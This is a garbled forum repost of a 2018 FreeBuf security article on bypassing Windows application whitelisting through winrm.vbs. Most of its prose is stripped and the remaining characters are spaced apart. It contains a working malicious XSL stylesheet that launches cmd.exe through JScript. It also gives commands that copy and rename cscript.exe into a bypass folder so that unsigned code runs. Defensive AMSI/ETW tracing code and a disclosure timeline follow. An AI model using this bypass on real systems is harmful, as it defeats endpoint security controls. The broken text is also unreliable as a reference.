搜索

[12998] 2018-07-29_利用Winrm.vbs绕过白名单限制执行任意代码

文档创建者:s7ckTeam
浏览次数:55
最后更新:2025-01-18
2018-07-29_利用Winrm.vbs绕过白名单限制执行任意代码 W i n r m . v b s   F r e e B u f   2 0 1 8 - 0 7 - 2 9     w i n r m . v b s s y s t e m 3 2 W i n d o w s X S L w i n r m . v b s ' - f o r m a t : p r e t t y ' ' - f o r m a t : t e x t ' w i n r m . v b s c s c r i p t . e x e W s m P t y . x s l W s m t x t . x s l c s c r i p t . e x e X S L C a s e y   S m i t h w m i c . e x e P O C P O C 1 . W s m P t y . x s l W s m T x t . x s l 2 . c s c r i p t . e x e w s c r i p t . e x e 3 . X S L ( W s m P t y . x s l W s m T x t . x s l ) w i n r m . v b s ( ' - f o r m a t : p r e t t y ' ' - f o r m a t : t e x t ' ) X S L C : B y p a s s D i r W s m P t y . x s l : < ? x m l   v e r s i o n = ' 1 . 0 ' ? > < s t y l e s h e e t x m l n s = " h t t p : / / w w w . w 3 . o r g / 1 9 9 9 / X S L / T r a n s f o r m "   x m l n s : m s = " u r n : s c h e m a s - m i c r o s o f t - c o m : x s l t " x m l n s : u s e r = " p l a c e h o l d e r " v e r s i o n = " 1 . 0 " > < o u t p u t   m e t h o d = " t e x t " / >   < m s : s c r i p t   i m p l e m e n t s - p r e f i x = " u s e r "   l a n g u a g e = " J S c r i p t " >   < ! [ C D A T A [   v a r   r   =   n e w   A c t i v e X O b j e c t ( " W S c r i p t . S h e l l " ) . R u n ( " c m d . e x e " ) ;   ] ] >   < / m s : s c r i p t > < / s t y l e s h e e t > X S L D o t N e t T o J S c r i p t P a y l o a d X S L p a y l a o d m k d i r   % S y s t e m D r i v e % B y p a s s D i r c o p y   % w i n d i r % S y s t e m 3 2 c s c r i p t . e x e   % S y s t e m D r i v e % B y p a s s D i r % S y s t e m D r i v e % B y p a s s D i r c s c r i p t   / / n o l o g o   % w i n d i r % S y s t e m 3 2 w i n r m . v b s   g e t   w m i c i m v 2 / W i n 3 2 _ P r o c e s s ? H a n d l e = 4   - f o r m a t : p r e t t y C a s e y w m i c . e x e X S L V B S J S c r i p t M a t t   N e l s o n . v b s w i n r m . v b s ' W s m P t y ' ' W s m T x t ' C a s e y 使 X S L X S L W S H w i n r m . v b s W i n d o w s W s m P t y . x s l W s m T x t . x s l w i n r m . v b s ' p r e t t y ' ' t e x t ' c s c r i p t . e x e W s m P t y . x s l W s m T x t . x s l S y s t e m 3 2 X S L X S L w i n r m . v b s w i n r m . v b s ' w i n r m . v b s ' w i n r m . v b s w i n r m . v b s ' f o r m a t ' ' p r e t t y ' ' t e x t ' w i n r m . v b s x s l ' f o r m a t ' ( ) - f o r m a t : p r e t t y - f o r m a t : " p r e t t y "
/ f o r m a t : p r e t t y / f o r m a t : " p r e t t y " - f o r m a t : t e x t - f o r m a t : " t e x t " / f o r m a t : t e x t / f o r m a t : " t e x t " ' f o r m a t ' ' f o r m a t : ' x s l s y s t e m 3 2 c s r i p t . e x e w i n r m . v b s w i n r m . v b s c s c r i p t . e x e w i n r m . v b s w i n r m . v b s W S c r i p t . F u l l N a m e ' c s c r i p t . e x e ' c s c r i p t . e x e ' c s c r i p t . e x e ' c s c r i p t . e x e w i n r m . v b s ( w s c r i p t . e x e ) w i n r m . v b s w i n r m . v b s ' c s c r i p t . e x e ' m k d i r   % S y s t e m D r i v e % B y p a s s D i r c s c r i p t . e x e c o p y   % w i n d i r % S y s t e m 3 2 w s c r i p t . e x e   % S y s t e m D r i v e % B y p a s s D i r c s c r i p t . e x e w i n w o r d . e x e % S y s t e m D r i v e % B y p a s s D i r c s c r i p t . e x e w i n w o r d . e x e   / / n o l o g o   % w i n d i r % S y s t e m 3 2 w i n r m . v b s   g e t   w m i c i m v 2 / W i n 3 2 _ P r o c e s s ? H a n d l e = 4   - f o r m a t : p r e t t y P O C g e t   w m i c i m v 2 / W i n 3 2 _ P r o c e s s ? H a n d l e = 4 西 W i n R M ' f o r m a t ' ' c s c r i p t . e x e ' ' w s c r i p t . e x e ' s c r i p t . e x e ' ' ' ' W i n d o w s   D e f e n d e r   A p p l i c a t i o n   C o n t r o l ( W D A C ) U s e r   M o d e   C o d e   I n t e g r i t y ( U M C I ) W i n d o w s W i n d o w s W D A C c a t a l o g W D A C W D A C w i n r m . v b s w i n r m . v b s w i n r m . v b s W S H / X S L W S H / X S L W S H / X S L p a y l o a d S c r i p t L o g g i n g , P o w e r s h e l l W S H E T W A n t i m a l w a r e   S c a n   I n t e r f a c e ( A M S I ) W S H A M S I   E T W   P r o v i d e r A S M I K r a b s E T W l o g m a n . e x e E T L E T L A S M I A S M I T r a c e . e t l : l o g m a n   s t a r t   A M S I T r a c e   - p   M i c r o s o f t - A n t i m a l w a r e - S c a n - I n t e r f a c e   E v e n t 1   - o   A M S I T r a c e . e t l   - e t s < A f t e r   s t a r t i n g   t h e   t r a c e ,   t h i s   i s   w h e n   y o u ' d   r u n   y o u r   m a l i c i o u s   c o d e   t o   c a p t u r e   i t s   c o n t e x t . > l o g m a n   s t o p   A M S I T r a c e   - e t s E T W ' M i c r o s o f t - A n t i m a l w a r e - S c a n - I n t e r f a c e ' E W T   P r o v i d e r ' E v e n t 1 ' p r o v i d e r s ' E v e n t 1 ' A S M I p e r f v i e w . e x e E T W X M L p r o v i d e r < i n s t r u m e n t a t i o n M a n i f e s t   x m l n s = " h t t p : / / s c h e m a s . m i c r o s o f t . c o m / w i n / 2 0 0 4 / 0 8 / e v e n t s " >   < i n s t r u m e n t a t i o n   x m l n s : x s = " h t t p : / / w w w . w 3 . o r g / 2 0 0 1 / X M L S c h e m a "   x m l n s : x s i = " h t t p : / / w w w . w 3 . o r g / 2 0 0 1 / X M L S c h e m a - i n s t a n c e "   x m l n s : w i n = " h t t p : / / m a n i f e s t s . m i c r o s o f t . c o m / w i n / 2 0 0 4 / 0 8 / w i n d o w s / e v e n t s " >     < e v e n t s >       < p r o v i d e r   n a m e = " M i c r o s o f t - A n t i m a l w a r e - S c a n - I n t e r f a c e "   g u i d = " { 2 a 5 7 6 b 8 7 - 0 9 a 7 - 5 2 0 e - c 2 1 a - 4 9 4 2 f 0 2 7 1 d 6 7 } "   r e s o u r c e F i l e N a m e = " M i c r o s o f t - A n t i m a l w a r e - S c a n - I n t e r f a c e "   m e s s a g e F i l e N a m e = " M i c r o s o f t - A n t i m a l w a r e - S c a n - I n t e r f a c e "   s y m b o l = " M i c r o s o f t A n t i m a l w a r e S c a n I n t e r f a c e "   s o u r c e = " X m l "   >         < k e y w o r d s >           < k e y w o r d   n a m e = " E v e n t 1 "   m e s s a g e = " $ ( s t r i n g . k e y w o r d _ E v e n t 1 ) "   m a s k = " 0 x 1 " / >         < / k e y w o r d s >         < t a s k s >           < t a s k   n a m e = " t a s k _ 0 "   m e s s a g e = " $ ( s t r i n g . t a s k _ t a s k _ 0 ) "   v a l u e = " 0 " / > M i c r o s o f t - A n t i m a l w a r e - S c a n - I n t e r f a c e l o g m a n   q u e r y   p r o v i d e r s
        < / t a s k s >         < e v e n t s >           < e v e n t   v a l u e = " 1 1 0 1 "   s y m b o l = " t a s k _ 0 "   v e r s i o n = " 0 "   t a s k = " t a s k _ 0 "   l e v e l = " w i n : I n f o r m a t i o n a l "   k e y w o r d s = " E v e n t 1 "   t e m p l a t e = " t a s k _ 0 A r g s " / >         < / e v e n t s >         < t e m p l a t e s >           < t e m p l a t e   t i d = " t a s k _ 0 A r g s " >             < d a t a   n a m e = " s e s s i o n "   i n T y p e = " w i n : P o i n t e r " / >             < d a t a   n a m e = " s c a n S t a t u s "   i n T y p e = " w i n : U I n t 8 " / >             < d a t a   n a m e = " s c a n R e s u l t "   i n T y p e = " w i n : U I n t 3 2 " / >             < d a t a   n a m e = " a p p n a m e "   i n T y p e = " w i n : U n i c o d e S t r i n g " / >             < d a t a   n a m e = " c o n t e n t n a m e "   i n T y p e = " w i n : U n i c o d e S t r i n g " / >             < d a t a   n a m e = " c o n t e n t s i z e "   i n T y p e = " w i n : U I n t 3 2 " / >             < d a t a   n a m e = " o r i g i n a l s i z e "   i n T y p e = " w i n : U I n t 3 2 " / >             < d a t a   n a m e = " c o n t e n t "   i n T y p e = " w i n : B i n a r y "   l e n g t h = " c o n t e n t s i z e " / >             < d a t a   n a m e = " h a s h "   i n T y p e = " w i n : B i n a r y " / >             < d a t a   n a m e = " c o n t e n t F i l t e r e d "   i n T y p e = " w i n : B o o l e a n " / >           < / t e m p l a t e >         < / t e m p l a t e s >       < / p r o v i d e r >     < / e v e n t s >   < / i n s t r u m e n t a t i o n >   < l o c a l i z a t i o n >     < r e s o u r c e s   c u l t u r e = " e n - U S " >       < s t r i n g T a b l e >         < s t r i n g   i d = " k e y w o r d _ E v e n t 1 "   v a l u e = " E v e n t 1 " / >         < s t r i n g   i d = " t a s k _ t a s k _ 0 "   v a l u e = " t a s k _ 0 " / >       < / s t r i n g T a b l e >     < / r e s o u r c e s >   < / l o c a l i z a t i o n > < / i n s t r u m e n t a t i o n M a n i f e s t > E T L G e t - W i n E v e n t p o w e r s h e l l E T L A S M I W S H ' c o n t e n t n a m e ' p o w e r s h e l l #   S c r i p t   a u t h o r :   M a t t   G r a e b e r   ( @ m a t t i f e s t a t i o n ) #   l o g m a n   s t a r t   A M S I T r a c e   - p   M i c r o s o f t - A n t i m a l w a r e - S c a n - I n t e r f a c e   E v e n t 1   - o   A M S I T r a c e . e t l   - e t s #   D o   y o u r   m a l i c i o u s   t h i n g s   h e r e   t h a t   w o u l d   b e   l o g g e d   b y   A M S I #   l o g m a n   s t o p   A M S I T r a c e   - e t s $ O S A r c h P r o p e r t y   =   G e t - C i m I n s t a n c e   - C l a s s N a m e   W i n 3 2 _ O p e r a t i n g S y s t e m   - P r o p e r t y   O S A r c h i t e c t u r e $ O S A r c h   =   $ O S A r c h P r o p e r t y . O S A r c h i t e c t u r e $ O S P o i n t e r S i z e   =   3 2 i f   ( $ O S A r c h   - e q   ' 6 4 - b i t ' )   {   $ O S P o i n t e r S i z e   =   6 4   } $ A M S I S c a n E v e n t s   =   G e t - W i n E v e n t   - P a t h   . A M S I T r a c e . e t l   - O l d e s t   - F i l t e r X P a t h   ' * [ S y s t e m [ E v e n t I D = 1 1 0 1 ] ] '   |   F o r E a c h - O b j e c t   {         i f   ( - n o t   $ _ . P r o p e r t i e s )   {                 #   T h e   A M S I   p r o v i d e r   i s   n o t   s u p p l y i n g   t h e   c o n t e n t n a m e   p r o p e r t y   w h e n   W S H   c o n t e n t   i s   l o g g e d   r e s u l t i n g                 #   i n   G e t - W i n E v e n t   o r   E v e n t   V i e w e r   b e i n g   u n a b l e   t o   p a r s e   t h e   d a t a   b a s e d   o n   t h e   s c h e m a .                 #   I f   t h i s   b u g   w e r e   n o t   p r e s e n t ,   r e t r i e v i n g   W S H   c o n t e n t   w o u l d   b e   t r i v i a l .                 $ P a y l o a d S t r i n g   =   ( [ X m l ]   $ _ . T o X m l ( ) ) . E v e n t . P r o c e s s i n g E r r o r D a t a . E v e n t P a y l o a d                 [ B y t e [ ] ]   $ P a y l o a d B y t e s   =   ( $ P a y l o a d S t r i n g   - s p l i t   ' ( [ 0 - 9 A - F ] { 2 } ) '   |   W h e r e - O b j e c t   { $ _ }   |   F o r E a c h - O b j e c t   { [ B y t e ]   " 0 x $ _ " } )                 $ M e m o r y S t r e a m   =   N e w - O b j e c t   - T y p e N a m e   I O . M e m o r y S t r e a m   - A r g u m e n t L i s t   @ ( , $ P a y l o a d B y t e s )                 $ B i n a r y R e a d e r   =   N e w - O b j e c t   - T y p e N a m e   I O . B i n a r y R e a d e r   - A r g u m e n t L i s t   $ M e m o r y S t r e a m ,   ( [ T e x t . E n c o d i n g ] : : U n i c o d e )                 s w i t c h   ( $ O S P o i n t e r S i z e )   {                         3 2   {   $ S e s s i o n   =   $ B i n a r y R e a d e r . R e a d U I n t 3 2 ( )   }                         6 4   {   $ S e s s i o n   =   $ B i n a r y R e a d e r . R e a d U I n t 6 4 ( )   }                 }                 $ S c a n S t a t u s   =   $ B i n a r y R e a d e r . R e a d B y t e ( )
                $ S c a n R e s u l t   =   $ B i n a r y R e a d e r . R e a d I n t 3 2 ( )                 $ S t r i n g B u i l d e r   =   N e w - O b j e c t   - T y p e N a m e   T e x t . S t r i n g B u i l d e r                 d o   {   $ C h a r V a l   =   $ B i n a r y R e a d e r . R e a d I n t 1 6 ( ) ;   $ n u l l   =   $ S t r i n g B u i l d e r . A p p e n d ( [ C h a r ]   $ C h a r V a l )   }   w h i l e   ( $ C h a r V a l   - n e   0 )                 $ A p p N a m e   =   $ S t r i n g B u i l d e r . T o S t r i n g ( )                 $ n u l l   =   $ S t r i n g B u i l d e r . C l e a r ( )                 $ C o n t e n t S i z e   =   $ B i n a r y R e a d e r . R e a d I n t 3 2 ( )                 $ O r i g i n a l S i z e   =   $ B i n a r y R e a d e r . R e a d I n t 3 2 ( )                 $ C o n t e n t R a w   =   $ B i n a r y R e a d e r . R e a d B y t e s ( $ C o n t e n t S i z e )                 $ C o n t e n t   =   [ T e x t . E n c o d i n g ] : : U n i c o d e . G e t S t r i n g ( $ C o n t e n t R a w )                 $ H a s h   =   [ B i t C o n v e r t e r ] : : T o S t r i n g ( $ B i n a r y R e a d e r . R e a d B y t e s ( 0 x 2 0 ) ) . R e p l a c e ( ' - ' ,   ' ' )                 [ B o o l ]   $ C o n t e n t F i l t e r e d   =   $ B i n a r y R e a d e r . R e a d I n t 3 2 ( )                 $ B i n a r y R e a d e r . C l o s e ( )                 [ P S C u s t o m O b j e c t ]   @ {                         S e s s i o n   =   $ S e s s i o n                         S c a n S t a t u s   =   $ S c a n S t a t u s                         S c a n R e s u l t   =   $ S c a n R e s u l t                         A p p N a m e   =   $ A p p N a m e                         C o n t e n t N a m e   =   $ n u l l                         C o n t e n t   =   $ C o n t e n t                         H a s h   =   $ H a s h                         C o n t e n t F i l t e r e d   =   $ C o n t e n t F i l t e r e d                 }         }   e l s e   {                 $ S e s s i o n   =   $ _ . P r o p e r t i e s [ 0 ] . V a l u e                 $ S c a n S t a t u s   =   $ _ . P r o p e r t i e s [ 1 ] . V a l u e                 $ S c a n R e s u l t   =   $ _ . P r o p e r t i e s [ 2 ] . V a l u e                 $ A p p N a m e   =   $ _ . P r o p e r t i e s [ 3 ] . V a l u e                 $ C o n t e n t N a m e   =   $ _ . P r o p e r t i e s [ 4 ] . V a l u e                 $ C o n t e n t   =   [ T e x t . E n c o d i n g ] : : U n i c o d e . G e t S t r i n g ( $ _ . P r o p e r t i e s [ 7 ] . V a l u e )                 $ H a s h   =   [ B i t C o n v e r t e r ] : : T o S t r i n g ( $ _ . P r o p e r t i e s [ 8 ] . V a l u e ) . R e p l a c e ( ' - ' ,   ' ' )                 $ C o n t e n t F i l t e r e d   =   $ _ . P r o p e r t i e s [ 9 ] . V a l u e                 [ P S C u s t o m O b j e c t ]   @ {                         S e s s i o n   =   $ S e s s i o n                         S c a n S t a t u s   =   $ S c a n S t a t u s                         S c a n R e s u l t   =   $ S c a n R e s u l t                         A p p N a m e   =   $ A p p N a m e                         C o n t e n t N a m e   =   $ C o n t e n t N a m e                         C o n t e n t   =   $ C o n t e n t                         H a s h   =   $ H a s h                         C o n t e n t F i l t e r e d   =   $ C o n t e n t F i l t e r e d                 }         } } $ A M S I S c a n E v e n t s p a y l o a d p i c   h e r e E T W 线 线 线 线 W i n d o w s   D e f e n d e r   A p p l i c a t i o n   C o n t r o l W i n d o w s 线 A p r i l   2 4 ,   2 0 1 8 M S R C A p r i l   2 4 ,   2 0 1 8 M S R C A p r i l   3 0 ,   2 0 1 8   M a y   2 4 ,   2 0 1 8 M S R C M a y   2 8 ,   2 0 1 8  
J u n e   1 0 ,   2 0 1 8 M S R C J u n e   1 1 ,   2 0 1 8 M S R C 8 J u l y   1 2 ,   2 0 1 8 M S R C   h t t p s : / / p o s t s . s p e c t e r o p s . i o / a p p l i c a t i o n - w h i t e l i s t i n g - b y p a s s - a n d - a r b i t r a r y - u n s i g n e d - c o d e - e x e c u t i o n - t e c h n i q u e - i n - w i n r m - v b s - c 8 c 2 4 f b 4 0 4 0 4   * F r e e B u f . C O M
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理